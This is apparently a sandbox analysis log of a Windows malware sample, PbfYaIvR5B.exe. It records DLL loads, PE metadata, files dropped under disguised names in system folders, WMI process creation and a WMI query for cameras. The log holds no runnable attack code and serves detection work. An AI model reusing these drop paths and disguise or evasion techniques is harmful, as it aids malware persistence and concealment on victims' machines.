                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wldp.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: profapi.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptsp.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rsaenh.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptbase.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: sspicli.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: mscoree.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: kernel.appcore.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: version.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: uxtheme.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: windows.storage.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wldp.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: profapi.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptsp.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rsaenh.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptbase.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: Window Recorder Window detected: More than 3 window changes detected
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Directory created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Directory created: C:\Program Files\Windows NT\Accessories\en-GB\6ccacd8608530f
                                    Source: PbfYaIvR5B.exe Static file information: File size 2319208 > 1048576
                                    Source: PbfYaIvR5B.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: PbfYaIvR5B.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: PbfYaIvR5B.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: PbfYaIvR5B.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: PbfYaIvR5B.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: PbfYaIvR5B.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: PbfYaIvR5B.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PbfYaIvR5B.exe, 00000000.00000003.1690511695.00000000073F8000.00000004.00000020.00020000.00000000.sdmp, PbfYaIvR5B.exe, 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp, PbfYaIvR5B.exe, 00000000.00000000.1688277278.0000000000073000.00000002.00000001.01000000.00000003.sdmp, PbfYaIvR5B.exe, 00000000.00000003.1689915107.0000000006AE0000.00000004.00000020.00020000.00000000.sdmp
                                    Source: PbfYaIvR5B.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: PbfYaIvR5B.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: PbfYaIvR5B.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: PbfYaIvR5B.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: PbfYaIvR5B.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe File created: C:\webHostnet\__tmp_rar_sfx_access_check_4875687
                                    Source: PbfYaIvR5B.exe Static PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0005F640 push ecx; ret 0_2_0005F653
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Code function: 0_2_0005EB78 push eax; ret 0_2_0005EB96
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 6_2_00007FFD9BAC4B8D push edx; retf 6_2_00007FFD9BAC4B93
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 6_2_00007FFD9BEBE452 push eax; ret 6_2_00007FFD9BEBE459
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 6_2_00007FFD9BEBE424 push esp; ret 6_2_00007FFD9BEBE425
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 6_2_00007FFD9BEBFBC4 push E8FFFFFFh; retf 6_2_00007FFD9BEBFBC9
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 6_2_00007FFD9BEBE682 push edx; ret 6_2_00007FFD9BEBE68F
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 6_2_00007FFD9BEBE614 push esp; ret 6_2_00007FFD9BEBE615
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Code function: 28_2_00007FFD9BAF60B1 pushfd ; ret 28_2_00007FFD9BAF60F1
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Code function: 28_2_00007FFD9BAC4B8D push edx; retf 28_2_00007FFD9BAC4B93
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Code function: 28_2_00007FFD9BAD8D1D push es; iretd 28_2_00007FFD9BAD8D29
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Code function: 28_2_00007FFD9BAD908E pushfd ; retf 28_2_00007FFD9BAD9093
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Code function: 29_2_00007FFD9BAD4B8D push edx; retf 29_2_00007FFD9BAD4B93
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Code function: 30_2_00007FFD9BAD8D1D push es; iretd 30_2_00007FFD9BAD8D29
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Code function: 30_2_00007FFD9BAD908E pushfd ; retf 30_2_00007FFD9BAD9093
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Code function: 30_2_00007FFD9BAC4B8D push edx; retf 30_2_00007FFD9BAC4B93
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Code function: 30_2_00007FFD9BAF60B1 pushfd ; ret 30_2_00007FFD9BAF60F1
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 31_2_00007FFD9BAB8D1D push es; iretd 31_2_00007FFD9BAB8D29
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 31_2_00007FFD9BAB908E pushfd ; retf 31_2_00007FFD9BAB9093
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 31_2_00007FFD9BAA4B8D push edx; retf 31_2_00007FFD9BAA4B93
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 31_2_00007FFD9BAD60B1 pushfd ; ret 31_2_00007FFD9BAD60F1
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Code function: 32_2_00007FFD9BA94B8D push edx; retf 32_2_00007FFD9BA94B93
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe Code function: 50_2_00007FFD9BAA4B8D push edx; retf 50_2_00007FFD9BAA4B93
                                    Source: MsPortSavesruntime.exe.0.dr Static PE information: section name: .text entropy: 7.548029610292584
                                    Source: AvdGjRxbXYfvkpkpztF.exe.6.dr Static PE information: section name: .text entropy: 7.548029610292584
                                    Source: AvdGjRxbXYfvkpkpztF.exe0.6.dr Static PE information: section name: .text entropy: 7.548029610292584
                                    Source: Idle.exe.6.dr Static PE information: section name: .text entropy: 7.548029610292584
                                    Source: AvdGjRxbXYfvkpkpztF.exe1.6.dr Static PE information: section name: .text entropy: 7.548029610292584

                                    Persistence and Installation Behavior

                                    Source: C:\webHostnet\MsPortSavesruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File created: C:\Users\user\Desktop\MXTAwxLv.log
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File created: C:\Users\user\Desktop\lhjGsiaz.log
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File created: C:\Users\user\Desktop\XLyrgJGd.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Users\user\Desktop\mhsoucuo.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Users\user\Desktop\CjxtNgkC.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Users\user\Desktop\XGvzhUkS.log
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File created: C:\Users\user\Desktop\wVOwcuVh.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Users\user\Desktop\MaBbbrQq.log
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe File created: C:\webHostnet\MsPortSavesruntime.exe
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe File created: C:\Users\user\Desktop\XurZRnMb.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Users\user\Desktop\MSRJxIpk.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe File created: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
